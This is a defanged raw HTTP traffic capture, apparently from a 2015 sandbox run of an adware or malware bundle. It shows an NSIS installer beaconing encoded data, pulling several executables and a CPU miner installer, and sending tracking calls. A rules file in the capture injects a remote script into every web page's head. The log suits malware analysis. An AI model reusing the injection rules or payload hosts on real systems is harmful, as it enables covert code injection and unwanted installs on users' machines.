GET /fp?alpha=A0E1QRo8DxMHXnc7GmsVAgVmTBoDHSMwWyRAZFVFRRE7FQkVajgxdXQFKDU/K0o1FmJxKl9DW2labB4MAwlIMG1tQHQoG1AVK0NZPBgXIntcXC4VWxdFfT8ScCc3AQYME2xKHVc4Mz59AwYsR1ZcUTUcZwA2U0NcAkZkHQ4QRgofYQs+MAxeBwAmQl97FVMnGFEMMwBBRFQxNQpwLicFUxhBYEccUi00N2QHCjkVSU8ENwQ0VycPQU5NGml9VFlBFxgkfSciDkQMQn8bGCYUAD9kJSklQgRBSWI9G3QvMQMEE0EqCxIxZGtjK0ZAOTMeCQJuQDNBWRdAURxDYx82EFEMGDhgMndVHFZpJkJSDklEXgVHKDYRW2RNYzkHdC8xCnQHY24layI/aEQOXW8YcQ== HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 30 Apr 2015 23:07:14 GMT
Content-Length: 0
GET /ii?alpha=... HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 30 Apr 2015 23:07:14 GMT
Content-Length: 849
POST /if?alpha=... HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Content-Length: 78
Connection: Keep-Alive
Cache-Control: no-cache
alpha=Bj59QGV0PEtiFVgoeCQLIWEuU3p8anxhCQEQP3YoRD5NKj8AEyFab1EhISptBn8hSjoHGEcf
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 30 Apr 2015 23:07:14 GMT
Content-Length: 849
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 30 Apr 2015 23:07:14 GMT
Content-Length: 41
{"status":"OK","url":null,"message":null}
GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1
Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Mar 2015 05:02:25 GMT
If-None-Match: "a1132b8ef65d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 304 Not Modified
Content-Type: application/pkix-crl
Last-Modified: Tue, 24 Mar 2015 05:02:25 GMT
ETag: "a1132b8ef65d01:0"
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:11:47 GMT
Connection: keep-alive
GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Tue, 14 Apr 2015 05:02:07 GMT
Accept-Ranges: bytes
ETag: "2711f7277076d01:0"
Server: Microsoft-IIS/8.5
VTag: 279782516600000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 554
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:12:18 GMT
Connection: keep-alive
GET /mobile/mt-core.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:07 GMT
Server: Apache
Last-Modified: Fri, 04 Mar 2011 18:46:26 GMT
ETag: "1448627-161ce-49dac90326480"
Accept-Ranges: bytes
Content-Length: 90574
Connection: close
Content-Type: application/x-javascript
GET /CPUminer/cpuminer-x11opt-setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:08 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1427702688"
Last-Modified: Mon, 30 Mar 2015 08:04:48 GMT
Cache-Control: max-age=73285
Content-Length: 2586343
Content-Type: application/octet-stream
X-HW: 1430435229.dop007.am4.t,1430435228.cds054.am4.c
Content-Disposition: attachment; filename="cpuminer-x11opt-setup.exe"
GET /V19/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.amoninst.com/index.php
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: cdn1.lawfuldownload.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 61399
Connection: keep-alive
Date: Fri, 24 Apr 2015 08:51:14 GMT
Last-Modified: Thu, 19 Feb 2015 14:37:18 GMT
ETag: "52bb6eb78bfd9436ad34be6fc97eae8c"
Accept-Ranges: bytes
Server: AmazonS3
Age: 61933
X-Cache: Hit from cloudfront
Via: 1.1 1215b20e825091002cc9421604422697.cloudfront.net (CloudFront)
X-Amz-Cf-Id: xvLGUt83RdPMDlFA2UmHO8rLncLUKhDgc5SLuQQXMezdvUXxw9WTfg==
GET /v4/sof-installer/MAS_WIN7X64_adm_1FEBFBFF000306C3?action=pcm.chromesyn.exist HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
GET /get_info?pid=7718 HTTP/1.1
Accept: */*
Host: loadmoney.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: text/html
Content-Length: 70
Connection: keep-alive
X-Powered-By: PHP/5.4.40
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 30 Apr 2015 23:07:08 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: guest_sess_id=g-a79ad5449bfbd23a1412336daed149245542; expires=Fri, 01-May-2015 23:07:08 GMT; path=/; domain=loadmoney.ru
{"rfr":"openpart","dmn":"horses.profsummer.ru","bin_dmn":"brbshop.ru"}
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1762
content-transfer-encoding: binary
Cache-Control: max-age=329046, public, no-transform, must-revalidate
Last-Modified: Mon, 27 Apr 2015 18:34:46 GMT
Expires: Mon, 4 May 2015 18:34:46 GMT
Date: Thu, 30 Apr 2015 23:12:11 GMT
Connection: keep-alive
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEALa8SdwQh28+NjkQGqVhx8= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1725
content-transfer-encoding: binary
Cache-Control: max-age=561798, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 11:15:29 GMT
Expires: Thu, 7 May 2015 11:15:29 GMT
Date: Thu, 30 Apr 2015 23:12:11 GMT
Connection: keep-alive
GET /root.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.globalsign.net
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:57 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 649
Connection: keep-alive
Set-Cookie: __cfduid=d9646b74727c3a81fb354a8417669753a1430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.net; HttpOnly
Expires: Wed, 15 Jul 2015 00:00:00 GMT
Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT
Cache-Control: public, max-age=6482883
CF-Cache-Status: HIT
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 1df6edc007da0f4b-FRA
POST /ocsp HTTP/1.1
Host: clients1.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Connection: keep-alive
Content-Length: 107
0i0g0E0C0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
.sR'..i..0.0... .....0... 0... .....0..
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 30 Apr 2015 23:07:21 GMT
Expires: Mon, 04 May 2015 23:07:21 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=1
POST /ocsp HTTP/1.1
Host: clients1.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Connection: keep-alive
Content-Length: 107
0i0g0E0C0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.....F......0.0... .....0... 0... .....0..
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 30 Apr 2015 23:07:21 GMT
Expires: Mon, 04 May 2015 23:07:21 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=1
GET /msdownload/update/v3/static/trustedr/en/D69B561148F01C77C54578C10926DF5B856976AD.crt?675a91727ba9c962 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 867
Date: Thu, 30 Apr 2015 23:11:56 GMT
Connection: keep-alive
GET /root-r3.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.globalsign.net
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:56 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 594
Connection: keep-alive
Set-Cookie: __cfduid=d25feb04b850f57981ac8c792aba941aa1430435516; expires=Fri, 29-Apr-16 23:11:56 GMT; path=/; domain=.globalsign.net; HttpOnly
Expires: Wed, 15 Jul 2015 00:00:00 GMT
Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT
Cache-Control: public, max-age=6482884
CF-Cache-Status: HIT
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 1df6edbc30fe046d-FRA
GET //MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:51 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=119928, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:15:51 GMT
Expires: Sat, 02 May 2015 10:15:51 GMT
ETag: "b2a2c0ce8f0f9b25572e41e1706cd0a01fa1f1ef"
Content-Length: 1741
Connection: close
Content-Type: application/ocsp-response
GET /mobile/MobiMidia_validation.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:06 GMT
Server: Apache
Last-Modified: Sun, 27 Oct 2013 16:29:25 GMT
ETag: "1b34285-23a2-4e9bb7c92e340"
Accept-Ranges: bytes
Content-Length: 9122
Connection: close
Content-Type: application/x-javascript
if (ID_MobiMidia_Serv != '') {
    ApiBlock = false;
    //document.write(unescape(""));
    document.write(unescape(""));
    function MobiMidia_addOption(selectId, txt, val, selected) {
        var objOption = new Option(txt, val, selected);
        self.document.getElementById(selectId).options.add(objOption);
    }
    function MobiMidia_keyNumber(e) {
        if (e.keyCode != 9 && e.keyCode != 13) {
            var keyChar = String.fromCharCode(e.which ? e.which : e.keyCode);
            filteredValues = "1234567890";
            if ((filteredValues.indexOf(keyChar) == -1) && ((keyChar.charCodeAt(0) != 8)&&(keyChar.charCodeAt(0) != 46)&&(keyChar.charCodeAt(0) != 37)&&(keyChar.charCodeAt(0) != 38)&&(keyChar.charCodeAt(0) != 39)&&(keyChar.charCodeAt(0) != 40)) ) return false;
        }
    }
    function MobiMidia_AtivaCel() {
        if (self.document.getElementById('MobiMidia_DDD').value.length == 2) {
            self.document.getElementById('MobiMidia_Number').focus();
        }
    }

    function MobiMidia_NonoDigito() {
        if (self.document.getElementById('MobiMidia_DDD').value < 30) {<<< skipped >>>
GET /ironsrc_prot.png?nocache=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: desprotetordelinks.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:09 GMT
Content-Type: image/png
Content-Length: 14566
Connection: keep-alive
Last-Modified: Mon, 16 Mar 2015 23:54:21 GMT
ETag: "5720b2-38e6-5117091a3e540"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f9655da909467756 HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Mar 2015 16:17:41 GMT
If-None-Match: "804047d4e66d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 304 Not Modified
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Mar 2015 16:17:41 GMT
ETag: "804047d4e66d01:0"
Cache-Control: max-age=86400
Date: Thu, 30 Apr 2015 23:11:15 GMT
Connection: keep-alive
GET /310714d/310714_mb.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: application/octet-stream
Content-Length: 36948
Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GET /310714d/310714_is.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: application/octet-stream
Content-Length: 688202
Last-Modified: Sat, 11 Apr 2015 13:41:40 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GET /310714d/240714_ps.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:43 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 523272
Content-Description: File Transfer
Content-Disposition: attachment; filename="240714_ps.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
GET /310714d/310714_a9.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:44 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 503904
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_a9.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
GET /310714d/310714_cp.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 101527
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_cp.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
GET /310714d/310714_ub.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 401 Unauthorized
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
GET /310714d/310714_am2.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 311296
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_am2.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
GET /Bw14Po HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: goo.gl
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Thu, 30 Apr 2015 23:07:04 GMT
Location: hXXp://VVV.4threquest.me/registro/310113f8.htm
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 191
Server: GSE
Alternate-Protocol: 80:quic,p=1
GET /v4/sof-ient/535559167_198339_B48A115F?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
{"stats":"ok","time":"1.97 ms","message":"store 3 action and 5 update "}
GET /v4/sof-ient/535559167_198339_B48A115F?action1=install.pcm HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
{"stats":"ok","time":"1.25 ms","message":"store 1 action and 0 update "}
GET /services/rules.txt?dummy=328 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:24 GMT
Content-Type: text/plain
Content-Length: 197
Connection: keep-alive
Last-Modified: Thu, 30 Apr 2015 22:05:54 GMT
ETag: "57c94d-c5-514f84ca6d480"
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</head>|<script src="hXXps://VVV.njaxjs.me/services/script.js"></script></head>
{njax_null}|<script src="hXXps://VVV.njaxjs.me/services/script.js" type="text/javascript"></script>
ncupons|nncupons
GET /services/update.php?v=1.2.0&key=RB2FatLSVuE3rC0Sz2xcEzbzGA6K2yY0&dummy=744 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:25 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
POST /?v=1.03&c=04dec24f&at=620310157&cntr=0 HTTP/1.1
Accept: */*
Host: info.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 152
Cache-Control: no-cache
6l7GU7LYt04pVHc/00d7JpnsyIlcQScF0Zt4fhTcnqAudVVTHAkQvjbNdQcTQVWncSm617pM7dCpzGdczEzIc45kZsS9dv8pqDIWlb4QaSVK72mxtb2fZpL7YThHh9D3L7nkLApli1btouR P4d9XA==
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Date: Thu, 30 Apr 2015 23:07:06 GMT
Content-Length: 960
Connection: keep-alive
HEAD /desprotetor_setup.exe HTTP/1.1
Accept: */*
Host: VVV.1strequest.me
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:44 GMT
Content-Type: application/octet-stream
Content-Length: 1117309
Last-Modified: Thu, 30 Apr 2015 03:46:04 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GET /desprotetor_setup.exe HTTP/1.1
Range: bytes=0-1117308
Accept: */*
Host: VVV.1strequest.me
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:44 GMT
Content-Type: application/octet-stream
Content-Length: 1117309
Last-Modified: Thu, 30 Apr 2015 03:46:04 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Content-Range: bytes 0-1117308/1117309
GET /v4/searchprotect/535559167_198339_B48A115F?action0=xa.geoip&action1=visit&action2=install HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
{"stats":"ok","time":"1.95 ms","message":"store 4 action and 0 update "}
GET / HTTP/1.1
Host: VVV.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg
Content-Length: 259
Date: Thu, 30 Apr 2015 23:07:20 GMT
Server: GFE/2.0
Alternate-Protocol: 80:quic,p=1
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg">here</A>.
</BODY></HTML>
GET /gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhhrE10BUs2OqNBLZ9KgzPNA== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:57 GMT
Content-Type: application/ocsp-response
Content-Length: 1474
Connection: keep-alive
